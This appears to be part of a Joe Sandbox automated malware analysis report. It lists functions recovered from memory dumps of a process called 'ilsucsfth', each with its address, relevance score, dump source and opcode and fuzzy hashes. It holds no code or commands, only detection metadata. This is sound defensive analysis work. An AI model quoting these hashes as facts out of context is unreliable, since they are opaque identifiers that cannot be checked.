                                                                                                          Function 06A5FEA8 Relevance: .1, Instructions: 87COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2425976372.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6a50000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 00663c21bb334c1ccd8c15d1f7d831cb0222f5b26d132c085fdf6e8f03285606
                                                                                                          • Instruction ID: 28dc4694411996021594578a469d31e414dd8f57594ab301296a8e9bf766d925
                                                                                                          • Opcode Fuzzy Hash: 00663c21bb334c1ccd8c15d1f7d831cb0222f5b26d132c085fdf6e8f03285606
                                                                                                          • Instruction Fuzzy Hash: 42313474E05219CFDB44DFA9D444AEEBBF6FB8A300F10802AE915A7345D7745A44CF90
                                                                                                          Function 0123D030 Relevance: .1, Instructions: 74COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2387464352.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_123d000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 55c37b4ef078aa470f1f4d4c83506c05f780c178a7235c14eb0a88e6d6e5887f
                                                                                                          • Instruction ID: 2ea7bf2162613ff2e746e7d33b8e02bde475c87b6371828ed1fe22062beadd71
                                                                                                          • Opcode Fuzzy Hash: 55c37b4ef078aa470f1f4d4c83506c05f780c178a7235c14eb0a88e6d6e5887f
                                                                                                          • Instruction Fuzzy Hash: CC2125B1514208DFCB11DF58DAC4B27FF65FBC4B14F60C169E9090B246C376D416CAA2
                                                                                                          Function 06B389A0 Relevance: .1, Instructions: 68COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4d73a585cf61fc783676f9bc8f9844ce381d16386ef2c452885d5f0854f24472
                                                                                                          • Instruction ID: 5d0368d6debd4f5c2e207820ac4cb181ce98e7e613d2149723859ee4c0980cde
                                                                                                          • Opcode Fuzzy Hash: 4d73a585cf61fc783676f9bc8f9844ce381d16386ef2c452885d5f0854f24472
                                                                                                          • Instruction Fuzzy Hash: 2A2107B0E0421DDFCB54DFA9D0846AEBBF1FB48300F10D5A9E419A7255D7349981CF92
                                                                                                          Function 06B310C8 Relevance: .1, Instructions: 57COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e1c99fbebd036f5a751ca3a560625a2af4ccc816fdbd10499efb680d1b013c56
                                                                                                          • Instruction ID: a512ca639697ca3bc80e81e1e26a40b26676e433e89c41183ab97859127efff9
                                                                                                          • Opcode Fuzzy Hash: e1c99fbebd036f5a751ca3a560625a2af4ccc816fdbd10499efb680d1b013c56
                                                                                                          • Instruction Fuzzy Hash: D71113B0E1121A9FCB44DFA8C9456BEBBF6BF49300F14846AD418E7351DA349A418BA1
                                                                                                          Function 0123D02B Relevance: .1, Instructions: 55COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2387464352.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_123d000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
                                                                                                          • Instruction ID: f556756880b0141f4b8cfd369bb7810419a3e1de51708d1a3a5a04e3f547cc1b
                                                                                                          • Opcode Fuzzy Hash: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
                                                                                                          • Instruction Fuzzy Hash: 9111D0B6504284CFDB12CF54D9C4B16FF71FB84714F24C2AAD9490B656C33AD41ACBA2
                                                                                                          Function 06B38990 Relevance: .0, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 34cb57f73c30998bdf11f12a24e2809e687326845f2d4132bbb6231536a0558d
                                                                                                          • Instruction ID: a4c0504a2782d335ae960c947685ce659fea07d307199f6c4f1f656dfe3f5f01
                                                                                                          • Opcode Fuzzy Hash: 34cb57f73c30998bdf11f12a24e2809e687326845f2d4132bbb6231536a0558d
                                                                                                          • Instruction Fuzzy Hash: DF11F3B0E05309CFCBA4CFA9D4452AEBFF1AB49300F1495AAD418A3215D7305681CF92
                                                                                                          Function 06B329C7 Relevance: .0, Instructions: 41COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 228415f248117f855cce03148a1a003795273bce12ac551ef86e6973462a845a
                                                                                                          • Instruction ID: ab6242d5c0cb12db331174f813e723abbd0ad84bbf0038cb5b369e2fe65fd473
                                                                                                          • Opcode Fuzzy Hash: 228415f248117f855cce03148a1a003795273bce12ac551ef86e6973462a845a
                                                                                                          • Instruction Fuzzy Hash: 5611F3B4A5122ECFCB65EF20DDA0AA9B7B1FB48304F1085E9D919A7254CB706E85CF50
                                                                                                          Function 06B3EA38 Relevance: .0, Instructions: 37COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6d2ff15c79e4e6c8ef2ad9da1cdc117d9934a6e6764c41fde3b904f94564b43f
                                                                                                          • Instruction ID: 0d2c7001556387122310b50abfd05c92d4dd43e1c7dfa0aec010a06cf3a8a55a
                                                                                                          • Opcode Fuzzy Hash: 6d2ff15c79e4e6c8ef2ad9da1cdc117d9934a6e6764c41fde3b904f94564b43f
                                                                                                          • Instruction Fuzzy Hash: 280190B4E1421EDFCB80EFA8D5446AEBBF1FB89300F2085AAD919A3344D7705A45CB91
                                                                                                          Function 06B350D8 Relevance: .0, Instructions: 35COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a6b0b6f43f1f9847a4b1d450b3bcf945a9f8e84507a5a828c047b12f57e26c61
                                                                                                          • Instruction ID: 1fea3ffd6b0d9546ea3b4a3ab99b0cd002ad03c6c1fcc21b8569f7445ca64e88
                                                                                                          • Opcode Fuzzy Hash: a6b0b6f43f1f9847a4b1d450b3bcf945a9f8e84507a5a828c047b12f57e26c61
                                                                                                          • Instruction Fuzzy Hash: D6F04971A09258AFCB91CFA8C950AEDBFF4AB09214F0481DAE858D7242C3368A51DB60
                                                                                                          Function 06B350E8 Relevance: .0, Instructions: 27COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 370b14c9dad41e788edc6ad83c5f116ef7660e4e2c776fb4febeb97eb2877b94
                                                                                                          • Instruction ID: 0b1fbde17e571bbdec84f3d6c7437ea4eba2016f1aec34d093fa890fd489bbc5
                                                                                                          • Opcode Fuzzy Hash: 370b14c9dad41e788edc6ad83c5f116ef7660e4e2c776fb4febeb97eb2877b94
                                                                                                          • Instruction Fuzzy Hash: 39F0F8B5E04218AFCB90DFA8D845AADBBF8AB48210F14C09AAC58D3241D6359A11DF50
                                                                                                          Function 06B31FA8 Relevance: .0, Instructions: 26COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 085c6f2370dd7594a7557bf4f01f8ef529ab023a05acdd5e6edc9f699e3413f1
                                                                                                          • Instruction ID: 45177cb79e1fc425773e1aafb62efb15b4e55127e9c660c8dbf45b9639a1434f
                                                                                                          • Opcode Fuzzy Hash: 085c6f2370dd7594a7557bf4f01f8ef529ab023a05acdd5e6edc9f699e3413f1
                                                                                                          • Instruction Fuzzy Hash: 30F0E5B4A0D2889FC744CBA8E8409BDBFB8DB5A321F1482D9E8449B395C7314E66C791
                                                                                                          Function 06A536F0 Relevance: .0, Instructions: 25COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2425976372.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6a50000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 00b6759c7f380ea59ab2fe6f0dbfbbff85ba526c6a1fbbbf1fda5dbceadc8e3b
                                                                                                          • Instruction ID: e4354070960c199f547dddeb7abb4aa4599011b1b98b742058d3113bafedd642
                                                                                                          • Opcode Fuzzy Hash: 00b6759c7f380ea59ab2fe6f0dbfbbff85ba526c6a1fbbbf1fda5dbceadc8e3b
                                                                                                          • Instruction Fuzzy Hash: 61F03AB5D09208EFCB41DFA4D9409ACBFB1EB89310F0480AAEC0497251D7314A21DF41
                                                                                                          Function 06B3F620 Relevance: .0, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a0751c84f7b7e9c582d3c0ac94bb45a575d6385f942ee8a4c038dc2cf7f6fd57
                                                                                                          • Instruction ID: 7c1c22f1a0828e3e993b17c9fa679838d954fa5b353ba48427896b92b8ef49a3
                                                                                                          • Opcode Fuzzy Hash: a0751c84f7b7e9c582d3c0ac94bb45a575d6385f942ee8a4c038dc2cf7f6fd57
                                                                                                          • Instruction Fuzzy Hash: B3E0E5B4E05208EFCB84DFA8D5446ACBBF8EB48300F10C0EA981893350DB319A02CF80
                                                                                                          Function 06B31FB8 Relevance: .0, Instructions: 21COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f13cdf2e4a759c33c637999bff7cb1b00e16fbfe8bf663eab06033baf3fcdc7a
                                                                                                          • Instruction ID: a9f3c413fdb9a5eef10f3a48e531670755b39e1ee574ac5effce7768fa482fad
                                                                                                          • Opcode Fuzzy Hash: f13cdf2e4a759c33c637999bff7cb1b00e16fbfe8bf663eab06033baf3fcdc7a
                                                                                                          • Instruction Fuzzy Hash: 9AE0DFB4A0810CABC740CF98E4009BCBBB8AB49310F1080D9E80453340CB319A02DB90
                                                                                                          Function 06B32F58 Relevance: .0, Instructions: 21COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e76399e538f074e448d42bce332f36963d0016544078f3115ed9ceb93be98b6f
                                                                                                          • Instruction ID: ef558bfb109600c47f3a98b593fc2340cdba4bebd6e2fd175189322711db1efd
                                                                                                          • Opcode Fuzzy Hash: e76399e538f074e448d42bce332f36963d0016544078f3115ed9ceb93be98b6f
                                                                                                          • Instruction Fuzzy Hash: 73F0AAB4A19228CFEBA0DF28D898B9DB7B1BB08304F0056E9D909A2245C7305A88CF05
                                                                                                          Function 06B3E868 Relevance: .0, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 82496dfef79dec3a323ce53c7bfc6346a8b10c5086956c38ea85db8fcbda72d5
                                                                                                          • Instruction ID: 04d1916e5df0b6128e12f5c1c2f27e9a251386f93008d3776a72665959afa36d
                                                                                                          • Opcode Fuzzy Hash: 82496dfef79dec3a323ce53c7bfc6346a8b10c5086956c38ea85db8fcbda72d5
                                                                                                          • Instruction Fuzzy Hash: D4E0ECB0E2625CDFCB84EFA8E5496ACBBF4EB08211F1050EAEC0993340EB305A51CB41
                                                                                                          Function 06B3B9E9 Relevance: .0, Instructions: 10COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2427958575.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_6b30000_ilsucsfth.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 052061221adea5100fc92336e3dce4d80b6dc52a18fb6fda3d6c9b61ef91a965
                                                                                                          • Instruction ID: a1e9ae16ce9c1ddd935fef78d3bcc03ace193cabe4575d673e3de73f96a1f1ed
                                                                                                          • Opcode Fuzzy Hash: 052061221adea5100fc92336e3dce4d80b6dc52a18fb6fda3d6c9b61ef91a965
                                                                                                          • Instruction Fuzzy Hash: 98D092B0A41629CFDBB0DF24DE54BAABBB1BB40302F0011D5900AA6659D7702E848F41